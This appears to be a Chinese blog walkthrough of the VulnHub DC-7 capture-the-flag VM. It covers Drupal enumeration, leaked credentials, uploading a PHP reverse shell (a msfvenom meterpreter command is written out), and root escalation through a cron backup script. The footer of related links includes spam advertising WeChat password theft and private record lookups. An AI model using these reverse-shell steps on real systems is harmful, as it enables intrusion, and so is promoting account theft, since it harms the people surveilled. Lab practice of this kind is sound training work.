Vulnhub靶机DC系列-DC7
0x0:靶场介绍
靶场名称: DC: 7
靶场发布时间:2019-4-26
靶场地址:https://www.vulnhub.com/entry/dc-7,356/
靶场描述:
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet
1x0:环境搭建
VMware虚拟机(桥接模式)
2x0:靶机渗透
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务 Drupal
提示不用爆破破解,使用dirb扫描一下目录
存在robots.txt文件
登录地址:
install.mysql 403!
版本大致的判断:
kali去搜索一下drupal8版本的的漏洞(都利用失败了,看一下其他思路才知道需要去下载代码)
直接搜索@DC7USER即可
下载,代码审计 config.php 有数据库的配置信息(没有什么其他可以利用的点)
玄学登录SSH尝试下一把
牛皮。
有一份mbox 邮件
提供一个路径/opt/scripts/backups.sh
解开这个文件,也没什么用。
发现一个可以修改drupal的管理员密码的命令
回到网站去登录管理员账号
具体的版本号
这里需要反弹shell 利用上传插件 插件地址:https://www.drupal.org/project/php
上传插件
上传成功
勾选安装
上传反弹shell
在网上找到一个反向shell的php使用msf生成php_shell也可以
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.3.20 LPORT=1234 -f raw
下载地址:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
下载下来,修改代码复制到文件中
修改一下既可(上传到页面保存就可以反弹出来)
3x0:提权篇
切换shell
发现backups.sh 具有root权限,但是在www-data组中 可以使用backups.sh 执行命令
直接写入反弹shell
等待连接即可
执行shell 等待连接
读取flag即可
相关文章
浏览器使用js代码快速删除微博内容
本文是分享如何用浏览器使用js代码快速删除微博内容 方法步骤 1.电脑进入自己微博主页->然后右键鼠标->审核米素->点下面的 2.第二个英文“Console”...
教你盗微信密码(无敌微信密码那走器)
教你盗微信密码(无敌微信密码那走器) 专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!以前人们在睡觉前喜欢看一会儿书,而到了现在的人们睡觉前则习惯看一会儿手机。不过大晚上的,有...
安徽检察机关三年批捕日本三大妖怪逾六千名涉黑涉恶犯罪嫌
中新社合肥1月18日电 (记者 赵强)记者18日从安徽省检察机关扫黑除恶专项斗争新闻发布会上获悉,三年以来,该省检察机关共批捕涉黑案件372件890人、涉恶案件1784件5227人;提起公诉涉黑案...
黑客阿叶,网络黑客可以具体找到谁吗,国外黑客卖信用卡信息网站
VPN维护不充分。 在测验的ATM中,一切的软件和硬件VPN计划都没有敞开。 假如VPN客户端在ATM之外,或进犯者能够拜访ATM cabinet,那么进犯者就能够装置在ATM和VPN硬件之间装置自己...
如何界定手机被黑客攻击了呢(如何界定手机被黑客攻击了呢图片)
怎样确认黑客入侵手机 移动数据的使用量增加:如果您的手机的移动数据使用量明显增加,而您自己并没有增加使用,那么这可能是黑客使用您的手机进行大量数据传输。前往疑似被黑客入侵的帐户登录页面,尝试用你的电子...
abs塑料比重是多少,ABS塑料材质及性能介绍!
abs树脂是五大合成树脂之一,其抗冲击性、耐热性、耐低温性、耐化学药品性及电气性能优良,还具有易加工、制品尺寸稳定、表面光泽性好等特点,容易涂装、着色,还可以进行表面喷镀金属、电镀、焊接、热压和粘接等...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!